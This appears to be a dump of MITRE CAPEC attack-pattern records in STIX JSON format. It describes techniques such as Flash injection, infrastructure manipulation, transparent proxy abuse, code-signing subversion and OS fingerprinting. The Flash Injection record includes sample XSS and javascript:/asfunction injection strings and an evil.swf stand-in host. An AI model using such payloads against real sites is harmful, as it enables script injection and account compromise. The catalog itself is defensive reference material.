+ "type": "attack-pattern",
33
+ "x_capec_abstraction": "Detailed",
34
+ "x_capec_child_of_refs": [
35
+ "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290"
36
+ ],
37
+ "x_capec_domains": [
38
+ "Software"
39
+ ],
40
+ "x_capec_example_instances": [
41
+ "\n <xhtml:p>The following code snippets can be used to detect various browsers:</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\">\n <xhtml:b>Firefox 2/3</xhtml:b>\n <xhtml:div style=\"margin-left:1em;\">FF=/a/[-1]=='a'</xhtml:div>\n <xhtml:b>Firefox 3</xhtml:b>\n <xhtml:div style=\"margin-left:1em;\">FF3=(function x(){})[-5]=='x'</xhtml:div>\n <xhtml:b>Firefox 2</xhtml:b>\n <xhtml:div style=\"margin-left:1em;\">FF2=(function x(){})[-6]=='x'</xhtml:div>\n <xhtml:b>IE</xhtml:b>\n <xhtml:div style=\"margin-left:1em;\">IE='\\v'=='v'</xhtml:div>\n <xhtml:b>Safari</xhtml:b>\n <xhtml:div style=\"margin-left:1em;\">Saf=/a/.__proto__=='//'</xhtml:div>\n <xhtml:b>Chrome</xhtml:b>\n <xhtml:div style=\"margin-left:1em;\">Chr=/source/.test((/a/.toString+''))</xhtml:div>\n <xhtml:b>Opera</xhtml:b>\n <xhtml:div style=\"margin-left:1em;\">Op=/^function \\(/.test([].sort)</xhtml:div>\n </xhtml:div>\n "
42
+ ],
43
+ "x_capec_prerequisites": [
44
+ "Victim's browser visits a website that contains attacker's Java ScriptJava Script is not disabled in the victim's browser"
45
+ ],
46
+ "x_capec_status": "Draft",
47
+ "x_capec_typical_severity": "Low",
48
+ "x_capec_version": "3.9"
49
+ }
50
+ ],
51
+ "spec_version": "2.0",
52
+ "type": "bundle"
53
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009.json ADDED
@@ -0,0 +1,57 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--e78dbb2c-96d1-4aa3-b43f-6009da885fe5",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An attacker exploits characteristics of the infrastructure of a network entity in order to perpetrate attacks or information gathering on network objects or effect a change in the ordinary information flow between network objects. Most often, this involves manipulation of the routing of network messages so, instead of arriving at their proper destination, they are directed towards an entity of the attackers' choosing, usually a server controlled by the attacker. The victim is often unaware that their messages are not being processed correctly. For example, a targeted client may believe they are connecting to their own bank but, in fact, be connecting to a Pharming site controlled by the attacker which then collects the user's login information in order to hijack the actual bank account.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-161",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/161.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-923",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/923.html"
18
+ }
19
+ ],
20
+ "id": "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009",
21
+ "modified": "2023-01-24T00:00:00.000Z",
22
+ "name": "Infrastructure Manipulation",
23
+ "object_marking_refs": [
24
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
25
+ ],
26
+ "type": "attack-pattern",
27
+ "x_capec_abstraction": "Meta",
28
+ "x_capec_can_precede_refs": [
29
+ "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642"
30
+ ],
31
+ "x_capec_domains": [
32
+ "Communications",
33
+ "Software",
34
+ "Hardware"
35
+ ],
36
+ "x_capec_parent_of_refs": [
37
+ "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb",
38
+ "attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54",
39
+ "attack-pattern--b3eaa7aa-9601-406c-ae82-0a0e2ea16116",
40
+ "attack-pattern--4733a63a-db36-49fa-8eba-3d5eddfe7f87",
41
+ "attack-pattern--8f91fa23-b5c4-48f1-be6c-99582524f8cc",
42
+ "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b"
43
+ ],
44
+ "x_capec_prerequisites": [
45
+ "The targeted client must access the site via infrastructure that the attacker has co-opted and must fail to adequately verify that the communication channel is operating correctly (e.g. by verifying that they are, in fact, connected to the site they intended.)"
46
+ ],
47
+ "x_capec_resources_required": [
48
+ "The attacker must be able to corrupt the infrastructure used by the client. For some variants of this attack, the attacker must be able to stand up their own services that mimic the services the targeted client intends to use."
49
+ ],
50
+ "x_capec_status": "Draft",
51
+ "x_capec_typical_severity": "High",
52
+ "x_capec_version": "3.9"
53
+ }
54
+ ],
55
+ "spec_version": "2.0",
56
+ "type": "bundle"
57
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2a8824eb-4fd0-45a4-9c3c-af3fd7c5e0ca.json ADDED
@@ -0,0 +1,113 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--ff333c97-6dff-490f-80c6-adb5e0d9c3ce",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An attacker tricks a victim to execute malicious flash content that executes commands or makes flash calls specified by the attacker. One example of this attack is cross-site flashing, an attacker controlled parameter to a reference call loads from content specified by the attacker.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-182",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/182.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-20",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/20.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-184",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/184.html"
23
+ },
24
+ {
25
+ "external_id": "CWE-697",
26
+ "source_name": "cwe",
27
+ "url": "http://cwe.mitre.org/data/definitions/697.html"
28
+ },
29
+ {
30
+ "description": "Stefano Di Paola, Finding Vulnerabilities in Flash Applications, OWASP Appsec 2007, 2007--11---15",
31
+ "external_id": "REF-46",
32
+ "source_name": "reference_from_CAPEC"
33
+ },
34
+ {
35
+ "description": "Rudra K. Sinha Roy, A Lazy Pen Tester's Guide to Testing Flash Applications, iViz",
36
+ "external_id": "REF-47",
37
+ "source_name": "reference_from_CAPEC",
38
+ "url": "http://www.ivizsecurity.com/blog/web-application-security/testing-flash-applications-pen-tester-guide/"
39
+ },
40
+ {
41
+ "description": "Peleus Uhley, Creating More Secure SWF Web Application, Adobe Systems Incorporated",
42
+ "external_id": "REF-48",
43
+ "source_name": "reference_from_CAPEC",
44
+ "url": "http://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html"
45
+ }
46
+ ],
47
+ "id": "attack-pattern--2a8824eb-4fd0-45a4-9c3c-af3fd7c5e0ca",
48
+ "modified": "2022-09-29T00:00:00.000Z",
49
+ "name": "Flash Injection",
50
+ "object_marking_refs": [
51
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
52
+ ],
53
+ "type": "attack-pattern",
54
+ "x_capec_abstraction": "Standard",
55
+ "x_capec_child_of_refs": [
56
+ "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032"
57
+ ],
58
+ "x_capec_consequences": {
59
+ "Access_Control": [
60
+ "Bypass Protection Mechanism"
61
+ ],
62
+ "Accountability": [
63
+ "Gain Privileges"
64
+ ],
65
+ "Authentication": [
66
+ "Gain Privileges"
67
+ ],
68
+ "Authorization": [
69
+ "Execute Unauthorized Commands (Run Arbitrary Code)",
70
+ "Gain Privileges",
71
+ "Bypass Protection Mechanism"
72
+ ],
73
+ "Confidentiality": [
74
+ "Other (Information Leakage)",
75
+ "Read Data"
76
+ ],
77
+ "Integrity": [
78
+ "Modify Data"
79
+ ],
80
+ "Non-Repudiation": [
81
+ "Gain Privileges"
82
+ ]
83
+ },
84
+ "x_capec_domains": [
85
+ "Social Engineering",
86
+ "Software"
87
+ ],
88
+ "x_capec_example_instances": [
89
+ "\n <xhtml:p>In the following example, the SWF file contains</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"informative\">getURL('javascript:SomeFunc(\"someValue\")','','GET')</xhtml:div>\n <xhtml:p>A request like</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"informative\">http://example.com/noundef.swf?a=0:0;alert('XSS')</xhtml:div>\n <xhtml:p>becomes</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"informative\">javascript:SomeFunc(\"someValue\")?a=0:0;alert(123)</xhtml:div>\n "
90
+ ],
91
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Find Injection Entry Points: </b>The attacker first takes an inventory of the entry points of the application.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Spider the website for all available URLs that reference a Flash application.</td></tr><tr><td>List all uninitialized global variables (such as _root.*, _global.*, _level0.*) in ActionScript, registered global variables in included files, load variables to external movies.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Determine the application's susceptibility to Flash injection: </b>Determine the application's susceptibility to Flash injection. For each URL identified in the explore phase, the attacker attempts to use various techniques such as direct load asfunction, controlled evil page/host, Flash HTML injection, and DOM injection to determine whether the application is susceptible to Flash injection.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Test the page using direct load asfunction, getURL,javascript:gotRoot(\"\")///d.jpg</td></tr><tr><td>Test the page using controlled evil page/host, http://example.com/evil.swf</td></tr><tr><td>Test the page using Flash HTML injection, \"'><img src='asfunction:getURL,javascript:gotRoot(\"\")//.jpg' ></td></tr><tr><td>Test the page using DOM injection, (gotRoot(''))</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Inject malicious content into target: </b>Inject malicious content into target utilizing vulnerable injection vectors identified in the Experiment phase</p></li></ol></div>",
92
+ "x_capec_likelihood_of_attack": "High",
93
+ "x_capec_parent_of_refs": [
94
+ "attack-pattern--8bd0c718-f126-4397-9754-c5225da7b696",
95
+ "attack-pattern--4ce65b20-6d2c-4217-b08a-e87b36c22353"
96
+ ],
97
+ "x_capec_prerequisites": [
98
+ "The target must be capable of running Flash applications. In some cases, the victim must follow an attacker-supplied link."
99
+ ],
100
+ "x_capec_resources_required": [
101
+ "None: No specialized resources are required to execute this type of attack. The attacker may need to be able to serve the injected Flash content."
102
+ ],
103
+ "x_capec_skills_required": {
104
+ "Medium": "The attacker needs to have knowledge of Flash, especially how to insert content the executes commands."
105
+ },
106
+ "x_capec_status": "Draft",
107
+ "x_capec_typical_severity": "Medium",
108
+ "x_capec_version": "3.9"
109
+ }
110
+ ],
111
+ "spec_version": "2.0",
112
+ "type": "bundle"
113
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0.json ADDED
@@ -0,0 +1,80 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--73bde986-5f1a-4a78-beee-14fb188e4a59",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary hosts an event within an application framework and then monitors the data exchanged during the course of the event for the purpose of harvesting any important data leaked during the transactions. One example could be harvesting lists of usernames or userIDs for the purpose of sending spam messages to those users. One example of this type of attack involves the adversary creating an event within the sub-application. Assume the adversary hosts a \"virtual sale\" of rare items. As other users enter the event, the attacker records via AiTM (CAPEC-94) proxy the user_ids and usernames of everyone who attends. The adversary would then be able to spam those users within the application using an automated script.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-383",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/383.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-311",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/311.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-319",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/319.html"
23
+ },
24
+ {
25
+ "external_id": "CWE-419",
26
+ "source_name": "cwe",
27
+ "url": "http://cwe.mitre.org/data/definitions/419.html"
28
+ },
29
+ {
30
+ "external_id": "CWE-602",
31
+ "source_name": "cwe",
32
+ "url": "http://cwe.mitre.org/data/definitions/602.html"
33
+ },
34
+ {
35
+ "description": "Input Capture: Credential API Hooking",
36
+ "external_id": "T1056.004",
37
+ "source_name": "ATTACK",
38
+ "url": "https://attack.mitre.org/wiki/Technique/T1056/004"
39
+ },
40
+ {
41
+ "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18",
42
+ "external_id": "REF-327",
43
+ "source_name": "reference_from_CAPEC"
44
+ }
45
+ ],
46
+ "id": "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0",
47
+ "modified": "2022-09-29T00:00:00.000Z",
48
+ "name": "Harvesting Information via API Event Monitoring",
49
+ "object_marking_refs": [
50
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
51
+ ],
52
+ "type": "attack-pattern",
53
+ "x_capec_abstraction": "Detailed",
54
+ "x_capec_can_precede_refs": [
55
+ "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b"
56
+ ],
57
+ "x_capec_child_of_refs": [
58
+ "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30"
59
+ ],
60
+ "x_capec_consequences": {
61
+ "Confidentiality": [
62
+ "Read Data (The adversary is able to gather information to potentially support further nefarious activities.)"
63
+ ]
64
+ },
65
+ "x_capec_domains": [
66
+ "Social Engineering",
67
+ "Social Engineering",
68
+ "Software"
69
+ ],
70
+ "x_capec_prerequisites": [
71
+ "The target software is utilizing application framework APIs"
72
+ ],
73
+ "x_capec_status": "Draft",
74
+ "x_capec_typical_severity": "Low",
75
+ "x_capec_version": "3.9"
76
+ }
77
+ ],
78
+ "spec_version": "2.0",
79
+ "type": "bundle"
80
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42.json ADDED
@@ -0,0 +1,60 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--e8dd7266-89c0-48b0-be20-de8283d68dcd",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "A transparent proxy serves as an intermediate between the client and the internet at large. It intercepts all requests originating from the client and forwards them to the correct location. The proxy also intercepts all responses to the client and forwards these to the client. All of this is done in a manner transparent to the client.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-465",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/465.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-441",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/441.html"
18
+ },
19
+ {
20
+ "description": "Proxy: Internal Proxy",
21
+ "external_id": "T1090.001",
22
+ "source_name": "ATTACK",
23
+ "url": "https://attack.mitre.org/wiki/Technique/T1090/001"
24
+ },
25
+ {
26
+ "description": "Robert Auger, Socket Capable Browser Plugins Result In Transparent Proxy Abuse, 2009",
27
+ "external_id": "REF-402",
28
+ "source_name": "reference_from_CAPEC",
29
+ "url": "http://www.thesecuritypractice.com/the_security_practice/TransparentProxyAbuse.pdf"
30
+ }
31
+ ],
32
+ "id": "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42",
33
+ "modified": "2022-09-29T00:00:00.000Z",
34
+ "name": "Transparent Proxy Abuse",
35
+ "object_marking_refs": [
36
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
37
+ ],
38
+ "type": "attack-pattern",
39
+ "x_capec_abstraction": "Standard",
40
+ "x_capec_child_of_refs": [
41
+ "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3"
42
+ ],
43
+ "x_capec_domains": [
44
+ "Software"
45
+ ],
46
+ "x_capec_extended_description": "\n <xhtml:p>Transparent proxies are often used by enterprises and ISPs. For requests originating at the client transparent proxies need to figure out the final destination of the client's data packet. Two ways are available to do that: either by looking at the layer three (network) IP address or by examining layer seven (application) HTTP header destination. A browser has same origin policy that typically prevents scripts coming from one domain initiating requests to other websites from which they did not come. To circumvent that, however, malicious Flash or an Applet that is executing in the user's browser can attempt to create a cross-domain socket connection from the client to the remote domain. The transparent proxy will examine the HTTP header of the request and direct it to the remote site thereby partially bypassing the browser's same origin policy. This can happen if the transparent proxy uses the HTTP host header information for addressing rather than the IP address information at the network layer. This attack allows malicious scripts inside the victim's browser to issue cross-domain requests to any hosts accessible to the transparent proxy.</xhtml:p>\n ",
47
+ "x_capec_prerequisites": [
48
+ "Transparent proxy is usedVulnerable configuration of network topology involving the transparent proxy (e.g., no NAT happening between the client and the proxy)Execution of malicious Flash or Applet in the victim's browser"
49
+ ],
50
+ "x_capec_skills_required": {
51
+ "Medium": "Creating malicious Flash or Applet to open a cross-domain socket connection to a remote system"
52
+ },
53
+ "x_capec_status": "Draft",
54
+ "x_capec_typical_severity": "Medium",
55
+ "x_capec_version": "3.9"
56
+ }
57
+ ],
58
+ "spec_version": "2.0",
59
+ "type": "bundle"
60
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b.json ADDED
@@ -0,0 +1,89 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--2e85fc87-3246-4170-988f-f0e932921dc9",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "Many languages use code signing facilities to vouch for code's identity and to thus tie code to its assigned privileges within an environment. Subverting this mechanism can be instrumental in an attacker escalating privilege. Any means of subverting the way that a virtual machine enforces code signing classifies for this style of attack.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-68",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/68.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-325",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/325.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-328",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/328.html"
23
+ },
24
+ {
25
+ "external_id": "CWE-1326",
26
+ "source_name": "cwe",
27
+ "url": "http://cwe.mitre.org/data/definitions/1326.html"
28
+ },
29
+ {
30
+ "description": "Subvert Trust Controls: Code Signing",
31
+ "external_id": "T1553.002",
32
+ "source_name": "ATTACK",
33
+ "url": "https://attack.mitre.org/wiki/Technique/T1553/002"
34
+ }
35
+ ],
36
+ "id": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b",
37
+ "modified": "2022-09-29T00:00:00.000Z",
38
+ "name": "Subvert Code-signing Facilities",
39
+ "object_marking_refs": [
40
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
41
+ ],
42
+ "type": "attack-pattern",
43
+ "x_capec_abstraction": "Standard",
44
+ "x_capec_can_follow_refs": [
45
+ "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517"
46
+ ],
47
+ "x_capec_child_of_refs": [
48
+ "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f"
49
+ ],
50
+ "x_capec_consequences": {
51
+ "Access_Control": [
52
+ "Gain Privileges"
53
+ ],
54
+ "Authorization": [
55
+ "Gain Privileges"
56
+ ],
57
+ "Confidentiality": [
58
+ "Gain Privileges"
59
+ ]
60
+ },
61
+ "x_capec_domains": [
62
+ "Software",
63
+ "Hardware"
64
+ ],
65
+ "x_capec_example_instances": [
66
+ "In old versions (prior to 3.0b4) of the Netscape web browser Attackers able to foist a malicious Applet into a client's browser could execute the \"Magic Coat\" attack. In this attack, the offending Applet would implement its own getSigners() method. This implementation would use the containing VM's APIs to acquire other Applet's signatures (by calling _their_ getSigners() method) and if any running Applet had privileged-enough signature, the malicious Applet would have inherited that privilege just be (metaphorically) donning the others' coats.",
67
+ "Some (older) web browsers allowed scripting languages, such as JavaScript, to call signed Java code. In these circumstances, the browser's VM implementation would choose not to conduct stack inspection across language boundaries (from called signed Java to calling JavaScript) and would short-circuit \"true\" at the language boundary. Doing so meant that the VM would allow any (unprivileged) script to call privileged functions within signed code with impunity, causing them to fall prey to luring attacks.",
68
+ "The ability to load unsigned code into the kernel of earlier versions of Vista and bypass integrity checking is an example of such subversion. In the proof-of-concept, it is possible to bypass the signature-checking mechanism Vista uses to load device drivers."
69
+ ],
70
+ "x_capec_likelihood_of_attack": "Low",
71
+ "x_capec_prerequisites": [
72
+ "A framework-based language that supports code signing (such as, and most commonly, Java or .NET)",
73
+ "Deployed code that has been signed by its authoring vendor, or a partner.",
74
+ "The attacker will, for most circumstances, also need to be able to place code in the victim container. This does not necessarily mean that they will have to subvert host-level security, except when explicitly indicated."
75
+ ],
76
+ "x_capec_resources_required": [
77
+ "The Attacker needs no special resources beyond the listed prerequisites in order to conduct this style of attack."
78
+ ],
79
+ "x_capec_skills_required": {
80
+ "High": "Subverting code signing is not a trivial activity. Most code signing and verification schemes are based on use of cryptography and the attacker needs to have an understanding of these cryptographic operations in good detail. Additionally the attacker also needs to be aware of the way memory is assigned and accessed by the container since, often, the only way to subvert code signing would be to patch the code in memory. Finally, a knowledge of the platform specific mechanisms of signing and verifying code is a must."
81
+ },
82
+ "x_capec_status": "Draft",
83
+ "x_capec_typical_severity": "Very High",
84
+ "x_capec_version": "3.9"
85
+ }
86
+ ],
87
+ "spec_version": "2.0",
88
+ "type": "bundle"
89
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2c22407a-efdb-4b20-81f6-ab8a73ded348.json ADDED
@@ -0,0 +1,79 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--e77eb85e-7571-4e7f-9a4f-28d5d9a7c059",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This OS fingerprinting probe sends a number of TCP SYN packets to an open port of a remote machine. The Initial Sequence Number (ISN) in each of the SYN/ACK response packets is analyzed to determine the smallest number that the target host uses when incrementing sequence numbers. This information can be useful for identifying an operating system because particular operating systems and versions increment sequence numbers using different values. The result of the analysis is then compared against a database of OS behaviors to determine the OS type and/or version.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-322",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/322.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-200",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/200.html"
18
+ },
19
+ {
20
+ "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
21
+ "external_id": "REF-33",
22
+ "source_name": "reference_from_CAPEC"
23
+ },
24
+ {
25
+ "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)",
26
+ "external_id": "REF-128",
27
+ "source_name": "reference_from_CAPEC",
28
+ "url": "http://www.faqs.org/rfcs/rfc793.html"
29
+ },
30
+ {
31
+ "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC",
32
+ "external_id": "REF-212",
33
+ "source_name": "reference_from_CAPEC"
34
+ }
35
+ ],
36
+ "id": "attack-pattern--2c22407a-efdb-4b20-81f6-ab8a73ded348",
37
+ "modified": "2018-07-31T00:00:00.000Z",
38
+ "name": "TCP (ISN) Greatest Common Divisor Probe",
39
+ "object_marking_refs": [
40
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
41
+ ],
42
+ "type": "attack-pattern",
43
+ "x_capec_abstraction": "Detailed",
44
+ "x_capec_child_of_refs": [
45
+ "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617"
46
+ ],
47
+ "x_capec_consequences": {
48
+ "Access_Control": [
49
+ "Bypass Protection Mechanism",
50
+ "Hide Activities"
51
+ ],
52
+ "Authorization": [
53
+ "Bypass Protection Mechanism",
54
+ "Hide Activities"
55
+ ],
56
+ "Confidentiality": [
57
+ "Read Data",
58
+ "Bypass Protection Mechanism",
59
+ "Hide Activities"
60
+ ]
61
+ },
62
+ "x_capec_domains": [
63
+ "Software"
64
+ ],
65
+ "x_capec_likelihood_of_attack": "Medium",
66
+ "x_capec_prerequisites": [
67
+ "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."
68
+ ],
69
+ "x_capec_resources_required": [
70
+ "A tool capable of sending and receiving packets from a remote system."
71
+ ],
72
+ "x_capec_status": "Stable",
73
+ "x_capec_typical_severity": "Low",
74
+ "x_capec_version": "3.9"
75
+ }
76
+ ],
77
+ "spec_version": "2.0",
78
+ "type": "bundle"
79
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80.json ADDED
@@ -0,0 +1,69 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--61c40fd6-7fab-4fac-9836-c2d2ae961fe1",
3
+ "objects": [
4
+ {
5
+ "created": "2015-11-09T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary installs and executes malicious code on the target system in an effort to achieve a negative technical impact. Examples include rootkits, ransomware, spyware, adware, and others.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-549",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/549.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-829",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/829.html"
18
+ }
19
+ ],
20
+ "id": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80",
21
+ "modified": "2021-06-24T00:00:00.000Z",
22
+ "name": "Local Execution of Code",
23
+ "object_marking_refs": [
24
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
25
+ ],
26
+ "type": "attack-pattern",
27
+ "x_capec_abstraction": "Meta",
28
+ "x_capec_can_follow_refs": [
29
+ "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2",
30
+ "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95"
31
+ ],
32
+ "x_capec_consequences": {
33
+ "Availability": [
34
+ "Execute Unauthorized Commands (Run Arbitrary Code)",
35
+ "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)"
36
+ ],
37
+ "Confidentiality": [
38
+ "Execute Unauthorized Commands (Run Arbitrary Code)",
39
+ "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)"
40
+ ],
41
+ "Integrity": [
42
+ "Execute Unauthorized Commands (Run Arbitrary Code)",
43
+ "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)"
44
+ ]
45
+ },
46
+ "x_capec_domains": [
47
+ "Software"
48
+ ],
49
